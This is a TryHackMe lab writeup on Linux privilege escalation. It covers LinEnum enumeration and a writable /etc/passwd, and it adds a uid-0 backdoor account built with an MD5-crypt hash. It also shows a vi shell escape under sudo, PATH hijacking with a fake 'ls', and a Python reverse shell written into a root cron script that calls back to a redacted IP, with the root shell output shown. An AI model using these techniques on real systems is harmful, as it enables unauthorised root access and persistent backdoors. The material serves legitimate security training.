TryHackMe (THM): Common Linux Privesc - Writeup

Enumeration

$ ./LinEnum.sh > out_LinEnum.txt

#2 What is the target’s hostname?

$ more out_LinEnum.txt
*snip*
[-] Hostname:
*snip*

#3 Look at the output of /etc/passwd; how many “user[x]” are there on the system?

[-] Group memberships:
*snip*
uid=1000(user1) gid=1000(user1) groups=1000(user1)
uid=1001(user2) gid=1001(user2) groups=1001(user2)
uid=1002(user3) gid=1002(user3) groups=1002(user3)
uid=1003(user4) gid=1003(user4) groups=1003(user4),0(root)
uid=120(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=1004(user5) gid=1004(user5) groups=1004(user5)
uid=1005(user6) gid=1005(user6) groups=1005(user6)
uid=121(mysql) gid=131(mysql) groups=131(mysql)
uid=1006(user7) gid=0(root) groups=0(root)
uid=1007(user8) gid=1007(user8) groups=1007(user8)
*snip*

user1 through user8 are listed, so there are eight.

#4 How many available shells are there on the system?

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash

#5 What is the name of the bash script that is set to run every 5 minutes by cron?

[-] Crontab contents:
*snip*
# m h dom mon dow user command
*/5 * * * * root /home/user4/Desktop/autoscript.sh
*snip*

#6 What critical file has had its permissions changed to allow some users to write to it?

[-] Can we read/write sensitive files:
-rw-rw-r-- 1 root root 2694 Mar 6 2020 /etc/passwd
-rw-r--r-- 1 root root 1087 Jun 5 2019 /etc/group
-rw-r--r-- 1 root root 581 Apr 22 2016 /etc/profile
-rw-r----- 1 root shadow 2359 Mar 6 2020 /etc/shadow

/etc/passwd is group-writable (rw-rw-r--) while the other files keep their default root-only write permission. Its group is root (gid 0), and the group memberships above show user4 (groups=0(root)) and user7 (gid=0(root)) in that group, so those accounts can edit the file.

Abusing SUID/GUID Files

#1 What is the path of the file in user3’s directory that stands out to you?

stands out to you
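LinEnum lists SUID/SGID files, but the writeup does not show the search itself. The following Python is an added example (not code from the writeup or from THM) that walks a directory tree, reports every setuid/setgid regular file, and separates the root-owned setuid ones outside the normal system directories, which are the candidates that "stand out". The fixture tree, file name and function names are my own assumptions; the answer to this question is not in the page and is not reproduced here.

```python
import os
import stat
import tempfile


def find_suid_sgid(root):
    """Walk `root` and return (path, mode, owner_uid) for every regular file
    with the setuid or setgid bit set. Same idea as
    find ROOT -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null,
    but unreadable directories are skipped quietly."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        # Do not descend into pseudo filesystems when scanning from /.
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in ("/proc", "/sys", "/dev")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, st.st_mode & 0o7777, st.st_uid))
    return hits


def interesting(hits):
    """Root-owned setuid files outside the usual system directories, e.g.
    something sitting in a user's home directory, deserve a second look."""
    system = ("/bin/", "/sbin/", "/usr/", "/lib/", "/lib64/", "/snap/")
    return [h for h in hits
            if h[2] == 0 and (h[1] & stat.S_ISUID) and not h[0].startswith(system)]


def make_demo_tree():
    """Constructed fixture (assumption, not the room's file): a temp dir with
    one setuid file and one plain file, so the scanner can be run offline."""
    d = tempfile.mkdtemp(prefix="suid_demo_")
    suid = os.path.join(d, "suspicious_bin")
    plain = os.path.join(d, "notes.txt")
    for p in (suid, plain):
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
    os.chmod(suid, 0o4755)   # rwsr-xr-x
    os.chmod(plain, 0o644)   # rw-r--r--
    return d, suid


if __name__ == "__main__":
    demo_dir, _ = make_demo_tree()
    for path, mode, uid in find_suid_sgid(demo_dir):
        print("%s %o uid=%d" % (path, mode, uid))
    # On a real target: find_suid_sgid("/") and then interesting(...)
```

Run it against "/" on the target and look at what interesting() leaves over; a setuid binary owned by root in a home directory is the kind of entry the question is pointing at.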

Exploiting Writeable /etc/passwd

#2 Having read the information above, what direction privilege escalation is this attack?

Remember the tree

#3 Before we add our new user, we first need to create a compliant password hash to add! We do this by using the command: “openssl passwd -1 -salt [salt] [password]”
What is the hash created by using this command with the salt, “new” and the password “123”?

user@kali:~$ openssl passwd -1 -salt new 123

#4 Great! Now we need to take this value, and create a new root user account. What would the /etc/passwd entry look like for a root user with the username “new” and the password hash we created before?

new:[hash from #3]:0:0:root:/root:/bin/bash
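The writeup shows the openssl command but not its output. As an added example (not code from the writeup), the following Python reimplements MD5-crypt, the "$1$" scheme that "openssl passwd -1 -salt SALT PASSWORD" uses, so the hash for salt "new" and password "123" can be regenerated without openssl, cross-checked against the system crypt(3) where Python still ships the crypt module, and turned into the /etc/passwd line for a uid-0 account. Function names are my own.

```python
import hashlib
import warnings

# crypt(3) base64 alphabet (not the RFC 4648 one)
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """Emit `count` six-bit groups of `value`, least significant first."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password, salt):
    """MD5-crypt ("$1$"), the scheme behind `openssl passwd -1 -salt SALT PW`.
    Port of the original FreeBSD algorithm; the salt is truncated to 8
    characters as crypt(3) does."""
    pw = password.encode()
    sl = salt.encode()[:8]
    magic = b"$1$"

    ctx = hashlib.md5(pw + magic + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    # Fold in the alternate digest, 16 bytes per 16 bytes of password.
    remaining = len(pw)
    while remaining > 0:
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    # For each bit of the password length: a NUL byte if set, else pw[0].
    i = len(pw)
    while i:
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    # 1000 stretching rounds whose inputs depend on the round number.
    for r in range(1000):
        c = hashlib.md5()
        c.update(pw if r & 1 else final)
        if r % 3:
            c.update(sl)
        if r % 7:
            c.update(pw)
        c.update(final if r & 1 else pw)
        final = c.digest()

    # Encode with the scheme's scrambled byte order: five groups of three
    # bytes, then the lone byte 11.
    encoded = ""
    for a, b, d in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        encoded += _to64((final[a] << 16) | (final[b] << 8) | final[d], 4)
    encoded += _to64(final[11], 2)
    return "$1$" + sl.decode() + "$" + encoded


def passwd_entry(username, password_hash, uid=0, gid=0, gecos="root",
                 home="/root", shell="/bin/bash"):
    """Build a seven-field /etc/passwd line. A hash in field 2 means the
    password is checked here instead of /etc/shadow; uid 0 makes the account
    root regardless of its name."""
    for field in (username, password_hash, gecos, home, shell):
        if ":" in field or "\n" in field:
            raise ValueError("field contains a separator: %r" % field)
    return ":".join([username, password_hash, str(uid), str(gid),
                     gecos, home, shell])


def verify_against_libc(password, salt):
    """Cross-check with the system crypt(3). Returns None when the crypt
    module is unavailable (it was dropped from the stdlib in Python 3.13)."""
    try:
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")   # deprecated on 3.11/3.12
            import crypt
    except ImportError:
        return None
    return crypt.crypt(password, "$1$" + salt + "$") == md5crypt(password, salt)


if __name__ == "__main__":
    h = md5crypt("123", "new")      # same as: openssl passwd -1 -salt new 123
    print(h)
    print(passwd_entry("new", h))   # the line to append to /etc/passwd
```

The salt is part of the output, so the line is only valid with the hash that was generated for it; the field check in passwd_entry() is there because a stray colon would shift every field after it and break the login.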

Escaping Vi Editor

#2 Let’s use the “sudo -l” command, what does this user require (or not require) to run vi as root?

$ sudo -l
*snip*
User user8 may run the following commands on polobox:
(root) NOPASSWD: /usr/bin/vi

No password is required. Once vi is running as root, its shell escape (":!sh", or ":set shell=/bin/sh" followed by ":shell") is the standard way to get the root shell.

Exploiting Crontab

#3 What is the flag to specify a payload in msfvenom?

$ msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
*snip*
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
*snip*

#5 What directory is the “autoscript.sh” under?

grep -r "autoscript.sh" /*
*snip*
/etc/crontab:*/5 * * * * root /home/user4/Desktop/autoscript.sh
*snip*

#6~#8

printf "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.**.**.**\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n" > /home/user4/Desktop/autoscript.sh
user@kali:~$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.4.16.12] from (UNKNOWN) [10.10.112.25] 48904
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

Exploiting PATH Variable

#2 Let’s go to user5’s home directory, and run the file “script”. What command do we think that it’s executing?

user5@polobox:~$ ./script
Desktop Documents Downloads Music Pictures Public script Templates Videos

#4 Now we’re inside tmp, let’s create an imitation executable. The format for what we want to do is:
echo “[whatever command we want to run]” > [name of the executable we’re imitating]
What would the command look like to open a bash shell, writing to a file with the name of the executable we’re imitating?

echo "/bin/bash" > ls

#5 Great! Now we’ve made our imitation, we need to make it an executable. What command do we execute to do this?

I already learned this in the "Learn Linux" room: the syntax of the command is chmod <permissions> <file>, so here it is chmod +x ls.
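The steps above (an unqualified "ls" inside the program, an impostor "ls" in a writable directory, chmod +x, and that directory placed first in PATH) are demonstrated end to end in the following Python, which is an added example and not code from the writeup. It creates a temporary directory in the role of /tmp, plants a fake "ls" whose payload prints a marker instead of spawning /bin/bash, and runs a stand-in for ./script once with the normal PATH and once with the hijacked one. The command runs with whatever privilege the caller has, which is why it matters on the target. Function names and the marker payload are my own assumptions.

```python
import os
import shutil
import stat
import subprocess
import tempfile


def plant_fake_binary(directory, name, payload="echo HIJACKED: $(id)"):
    """Drop an impostor called `name` into `directory` and make it
    executable, i.e. the echo "..." > ls and chmod +x ls steps. On the box
    the payload is /bin/bash; here it prints a marker so the effect is
    visible and testable."""
    path = os.path.join(directory, name)
    with open(path, "w") as f:
        f.write("#!/bin/sh\n" + payload + "\n")
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return path


def run_victim(command, path_env):
    """Stand-in for ./script: a program that invokes `ls` by bare name, so
    the shell walks PATH left to right to find it. Only PATH is passed in,
    so nothing else in the environment influences the lookup."""
    proc = subprocess.run(["/bin/sh", "-c", command], env={"PATH": path_env},
                          capture_output=True, text=True)
    return proc.stdout


def resolve(name, path_env):
    """Which file a bare command name resolves to under a given PATH."""
    return shutil.which(name, path=path_env)


def demo():
    """Run the victim with the original PATH and with a writable directory
    prepended (export PATH=/tmp:$PATH on the target); return both results."""
    original_path = os.environ.get("PATH", "/usr/bin:/bin")
    workdir = tempfile.mkdtemp(prefix="pathhijack_")   # plays the role of /tmp
    plant_fake_binary(workdir, "ls")
    hijacked_path = workdir + ":" + original_path
    return {
        "normal_resolves_to": resolve("ls", original_path),
        "hijacked_resolves_to": resolve("ls", hijacked_path),
        "normal_output": run_victim("ls", original_path),
        "hijacked_output": run_victim("ls", hijacked_path),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value.strip() if isinstance(value, str) else value)
```

The fix on the defensive side follows from the same demo: a privileged program must call /bin/ls by absolute path or reset PATH itself, because PATH is inherited from the unprivileged caller.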

yu1ch1

I’m a Japanese high school student. I’m interested in hacking. I will be a super hacker like “Spooky”, whom I respect the most. I have to study hacking for that.